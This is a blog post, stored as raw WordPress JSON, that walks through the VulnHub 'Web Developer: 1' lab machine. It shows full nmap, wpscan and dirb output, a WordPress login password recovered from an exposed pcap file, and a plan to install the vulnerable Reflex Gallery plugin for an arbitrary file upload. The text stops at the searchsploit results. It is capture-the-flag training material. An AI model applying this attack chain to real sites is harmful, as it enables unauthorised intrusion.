{"id":1231,"date":"2021-06-22T22:22:56","date_gmt":"2021-06-22T22:22:56","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1231"},"modified":"2021-06-22T22:22:56","modified_gmt":"2021-06-22T22:22:56","slug":"web-developer-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/22\/web-developer-1\/","title":{"rendered":"WEB DEVELOPER: 1"},"content":{"rendered":"<h2>Information About the Machine<\/h2>\n<p><strong>Description:<\/strong><br \/>\nA machine using the newest REMOVED Server, the newest REMOVED and containing some REMOVED....<\/p>\n<p><strong>Vulnhub Page:<\/strong><br \/>\n<a href=\"https:\/\/www.vulnhub.com\/entry\/web-developer-1,288\/\">https:\/\/www.vulnhub.com\/entry\/web-developer-1,288\/<\/a><\/p>\n<p><strong>Download Page:<\/strong><br \/>\n<a href=\"https:\/\/download.vulnhub.com\/webdeveloper\/WebDeveloper.ova\">https:\/\/download.vulnhub.com\/webdeveloper\/WebDeveloper.ova<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>Let's start by identifying the machine.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# arp-scan -l | grep 54:c9\n192.168.31.147  08:00:27:cc:54:c9   PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ifconfig eth0\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 192.168.31.130  netmask 255.255.255.0  broadcast 192.168.31.255\n        inet6 fe80::a00:27ff:fe0e:348d  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:0e:34:8d  txqueuelen 1000  (Ethernet)\n        RX packets 42100  bytes 63008084 (60.0 MiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 17094  bytes 1165859 (1.1 MiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n<\/code><\/pre>\n<p>Let's continue with an nmap scan.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nmap -p- -A -T4 
192.168.31.147\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-06-22 14:39 EDT\nNmap scan report for 192.168.31.147\nHost is up (0.00073s latency).\nNot shown: 65533 closed ports\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)\n|   256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)\n|_  256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-generator: WordPress 4.9.8\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Example site &amp;#8211; Just another WordPress site\nMAC Address: 08:00:27:CC:54:C9 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.73 ms 192.168.31.147\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 10.63 seconds\n<\/code><\/pre>\n<p>SSH and HTTP... While checking with Nikto I started a dirb scan and realized the machine was running WordPress. 
With wpscan I identified a user.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# wpscan --url http:\/\/192.168.31.147 -e vp,vt,tt,u,m --api-token ****************************                                                                                                                            5 \u2a2f\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.17\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/192.168.31.147\/ [192.168.31.147]\n[+] Started: Tue Jun 22 15:37:15 2021\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.29 (Ubuntu)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/192.168.31.147\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/192.168.31.147\/readme.html\n | Found 
By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/192.168.31.147\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/192.168.31.147\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).\n | Found By: Rss Generator (Passive Detection)\n |  - http:\/\/192.168.31.147\/index.php\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=4.9.8&lt;\/generator&gt;\n |  - http:\/\/192.168.31.147\/index.php\/comments\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=4.9.8&lt;\/generator&gt;\n |\n | [!] 27 vulnerabilities identified:\n |\n | [!] Title: WordPress &lt;= 5.0 - Authenticated File Delete\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/e3ef8976-11cb-4854-837f-786f43cbdf44\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20147\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress &lt;= 5.0 - Authenticated Post Type Bypass\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/999dba5a-82fb-4717-89c3-6ed723cc7e45\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20152\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/blog.ripstech.com\/2018\/wordpress-post-type-privilege-escalation\/\n |\n | [!] 
Title: WordPress &lt;= 5.0 - PHP Object Injection via Meta Data\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/046ff6a0-90b2-4251-98fc-b7fba93f8334\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20148\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress &lt;= 5.0 - Authenticated Cross-Site Scripting (XSS)\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3182002e-d831-4412-a27d-a5e39bb44314\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20153\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress &lt;= 5.0 - Cross-Site Scripting (XSS) that could affect plugins\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/7f7a0795-4dd7-417d-804e-54f12595d1e4\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20150\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460\n |\n | [!] Title: WordPress &lt;= 5.0 - User Activation Screen Search Engine Indexing\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/65f1aec4-6d28-4396-88d7-66702b21c7a2\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20151\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] 
Title: WordPress &lt;= 5.0 - File Upload to XSS on Apache Web Servers\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d741f5ae-52ca-417d-a2ca-acdfb7ca5808\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20149\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/246a70bdbfac3bd45ff71c7941deef1bb206b19a\n |\n | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/1a693e57-f99c-4df6-93dd-0cdc92fd0526\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-8942\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-8943\n |      - https:\/\/blog.ripstech.com\/2019\/wordpress-image-remote-code-execution\/\n |      - https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/wp_crop_rce\n |\n | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)\n |     Fixed in: 4.9.10\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d150f43f-6030-4191-98b8-20ae05585936\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-9787\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/0292de60ec78c5a44956765189403654fe4d080b\n |      - https:\/\/wordpress.org\/news\/2019\/03\/wordpress-5-1-1-security-and-maintenance-release\/\n |      - https:\/\/blog.ripstech.com\/2019\/wordpress-csrf-to-rce\/\n |\n | [!] 
Title: WordPress &lt;= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation\n |     Fixed in: 4.9.11\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4494a903-5a73-4cad-8c14-1e7b4da2be61\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16222\n |      - https:\/\/wordpress.org\/news\/2019\/09\/wordpress-5-2-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/30ac67579559fe42251b5a9f887211bf61a8ed68\n |      - https:\/\/hackerone.com\/reports\/339483\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Stored XSS in Customizer\n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d39a7b84-28b9-4916-a2fc-6192ceb6fa56\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17674\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Unauthenticated View Private\/Draft Posts\n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17671\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/f82ed753cf00329a5e41f2cb6dc521085136f308\n |      - https:\/\/0day.work\/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts\/\n |\n | [!] 
Title: WordPress &lt;= 5.2.3 - Stored XSS in Style Tags\n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d005b1f8-749d-438a-8818-21fba45c6465\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17672\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - JSON Request Cache Poisoning\n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/7804d8ed-457a-407e-83a7-345d3bbe07b2\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17673\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/b224c251adfa16a5f84074a3c0886270c9df38de\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation \n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/26a26de2-d598-405d-b00c-61f71cfacff6\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17669\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17670\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/9db44754b9e4044690a6c32fd74b9d5fe26b07b2\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] 
Title: WordPress &lt;= 5.2.3 - Admin Referrer Validation\n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/715c00e3-5302-44ad-b914-131c162c3f71\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17675\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.3 - Authenticated Improper Access Controls in REST API\n |     Fixed in: 4.9.13\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4a6de154-5fbd-4c80-acd3-8902ee431bd8\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-20043\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16788\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-g7rg-hchx-c2gw\n |\n | [!] Title: WordPress &lt;= 5.3 - Authenticated Stored XSS via Crafted Links\n |     Fixed in: 4.9.13\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/23553517-34e3-40a9-a406-f3ffbe9dd265\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16773\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/hackerone.com\/reports\/509930\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-xvg2-m2f4-83m7\n |\n | [!] 
Title: WordPress &lt;= 5.3 - Authenticated Stored XSS via Block Editor Content\n |     Fixed in: 4.9.13\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/be794159-4486-4ae1-a5cc-5c190e5ddf5f\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16781\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16780\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-pg4x-64rh-3c9v\n |\n | [!] Title: WordPress &lt;= 5.3 - wp_kses_bad_protocol() Colon Bypass\n |     Fixed in: 4.9.13\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/8fac612b-95d2-477a-a7d6-e5ec0bb9ca52\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-20041\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/b1975463dd995da19bb40d3fa0786498717e3c53\n |\n | [!] Title: WordPress &lt; 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated\n |     Fixed in: 4.9.14\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/7db191c0-d112-4f08-a419-a1cd81928c4e\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11027\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47634\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-ww7v-jg8c-q6jw\n |\n | [!] 
Title: WordPress &lt; 5.4.1 - Unauthenticated Users View Private Posts\n |     Fixed in: 4.9.14\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d1e1ba25-98c9-4ae7-8027-9632fb825a56\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11028\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47635\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-xhx9-759f-6p2w\n |\n | [!] Title: WordPress &lt; 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer\n |     Fixed in: 4.9.14\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4eee26bd-a27e-4509-a3a5-8019dd48e429\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11025\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47633\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-4mhg-j6fx-5g3c\n |\n | [!] 
Title: WordPress &lt; 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache\n |     Fixed in: 4.9.14\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/e721d8b9-a38f-44ac-8520-b4a9ed6a5157\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11029\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47637\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-568w-8m88-8g2c\n |\n | [!] Title: WordPress &lt; 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads\n |     Fixed in: 4.9.14\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/55438b63-5fc9-4812-afc4-2f1eff800d5f\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11026\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47638\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-3gw2-4656-pfr2\n |      - https:\/\/hackerone.com\/reports\/179695\n |\n | [!] 
Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure\n |     Fixed in: 4.9.17\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/6a3ec618-c79e-4b9c-9020-86b157458ac5\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-29450\n |      - https:\/\/wordpress.org\/news\/2021\/04\/wordpress-5-7-1-security-and-maintenance-release\/\n |      - https:\/\/blog.wpscan.com\/2021\/04\/15\/wordpress-571-security-vulnerability-release.html\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-pmmh-2f36-wvhq\n |      - https:\/\/core.trac.wordpress.org\/changeset\/50717\/\n |      - https:\/\/www.youtube.com\/watch?v=J2GXmxAdNWs\n |\n | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer\n |     Fixed in: 4.9.18\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4cd46653-4470-40ff-8aac-318bee2f998d\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-36326\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-19296\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/267061c9595fedd321582d14c21ec9e7da2dcf62\n |      - https:\/\/wordpress.org\/news\/2021\/05\/wordpress-5-7-2-security-release\/\n |      - https:\/\/github.com\/PHPMailer\/PHPMailer\/commit\/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9\n |      - https:\/\/www.wordfence.com\/blog\/2021\/05\/wordpress-5-7-2-security-release-what-you-need-to-know\/\n |      - https:\/\/www.youtube.com\/watch?v=HaW15aMzBUM\n\n[+] WordPress theme in use: twentyseventeen\n | Location: http:\/\/192.168.31.147\/wp-content\/themes\/twentyseventeen\/\n | Last Updated: 2021-04-27T00:00:00.000Z\n | Readme: http:\/\/192.168.31.147\/wp-content\/themes\/twentyseventeen\/README.txt\n | [!] 
The version is out of date, the latest version is 2.7\n | Style URL: http:\/\/192.168.31.147\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.9.8\n | Style Name: Twenty Seventeen\n | Style URI: https:\/\/wordpress.org\/themes\/twentyseventeen\/\n | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.7 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/192.168.31.147\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.9.8, Match: &#039;Version: 1.7&#039;\n\n[+] Enumerating Vulnerable Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)\n Checking Known Locations - Time: 00:00:00 &lt;==============================================================================================================================================================&gt; (352 \/ 352) 100.00% Time: 00:00:00\n[+] Checking Theme Versions (via Passive and Aggressive Methods)\n\n[i] No themes Found.\n\n[+] Enumerating Timthumbs (via Passive and Aggressive Methods)\n Checking Known Locations - Time: 00:00:01 &lt;============================================================================================================================================================&gt; (2575 \/ 2575) 100.00% Time: 00:00:01\n\n[i] No Timthumbs Found.\n\n[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to &quot;Plain&quot; for those to be detected)\n Brute Forcing Attachment IDs - Time: 00:00:00 &lt;==========================================================================================================================================================&gt; (100 \/ 100) 100.00% Time: 00:00:00\n\n[i] No Medias Found.\n\n[+] Enumerating Users (via Passive and 
Aggressive Methods)\n Brute Forcing Author IDs - Time: 00:00:00 &lt;================================================================================================================================================================&gt; (10 \/ 10) 100.00% Time: 00:00:00\n\n[i] User(s) Identified:\n\n[+] webdeveloper\n | Found By: Rss Generator (Passive Detection)\n | Confirmed By:\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/192.168.31.147\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 3\n | Requests Remaining: 19\n\n[+] Finished: Tue Jun 22 15:37:21 2021\n[+] Requests Done: 3090\n[+] Cached Requests: 10\n[+] Data Sent: 863.479 KB\n[+] Data Received: 950.471 KB\n[+] Memory used: 285.465 MB\n[+] Elapsed time: 00:00:06\n<\/code><\/pre>\n<p>I tried cracking it with hydra but was not successful. 
There was an interesting link in the dirb output...<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# dirb http:\/\/192.168.31.147 \n\n-----------------\nDIRB v2.22    \nBy The Dark Raver\n-----------------\n\nSTART_TIME: Tue Jun 22 15:15:10 2021\nURL_BASE: http:\/\/192.168.31.147\/\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\n\n-----------------\n\nGENERATED WORDS: 4612                                                          \n\n---- Scanning URL: http:\/\/192.168.31.147\/ ----\n+ http:\/\/192.168.31.147\/index.php (CODE:301|SIZE:0)                                                                                                                                                                                          \n==&gt; DIRECTORY: http:\/\/192.168.31.147\/ipdata\/      <\/code><\/pre>\n<p>Under the <strong><a href=\"http:\/\/192.168.31.147\/ipdata\/\">http:\/\/192.168.31.147\/ipdata\/<\/a><\/strong> folder there is a pcap file, and the user credentials used to log in to WordPress are visible in plain text. From this I identified the WordPress user's password. 
The followed stream of the relevant packet is below.<\/p>\n<pre><code class=\"language-sh\">POST \/wordpress\/wp-login.php HTTP\/1.1\nHost: 192.168.1.176\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http:\/\/192.168.1.176\/wordpress\/wp-login.php?redirect_to=http%3A%2F%2F192.168.1.176%2Fwordpress%2Fwp-admin%2F&amp;reauth=1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 152\nCookie: wordpress_test_cookie=WP+Cookie+check\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\n\nlog=webdeveloper&amp;pwd=Te5eQg%264sBS%21Yr%24%29wf%25%28DcAd&amp;wp-submit=Log+In&amp;redirect_to=http%3A%2F%2F192.168.1.176%2Fwordpress%2Fwp-admin%2F&amp;testcookie=1<\/code><\/pre>\n<p>With this I logged in to WordPress. I tried to get a reverse shell directly from the editor, but I did not have permission to modify the files. So I decided to install a vulnerable plugin. Here <strong>Reflex Gallery 3.1.3<\/strong> came to my aid. From the <a href=\"https:\/\/www.exploit-db.com\/exploits\/36374\">https:\/\/www.exploit-db.com\/exploits\/36374<\/a> page I first downloaded the vulnerable plugin and installed it in WordPress. 
Afterwards I read the exploit description.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# searchsploit reflex gallery          \n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nWordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit)                                                                                                                                        | php\/remote\/36809.rb\nWordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload                                                                                                                                               | php\/webapps\/36374.txt\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No 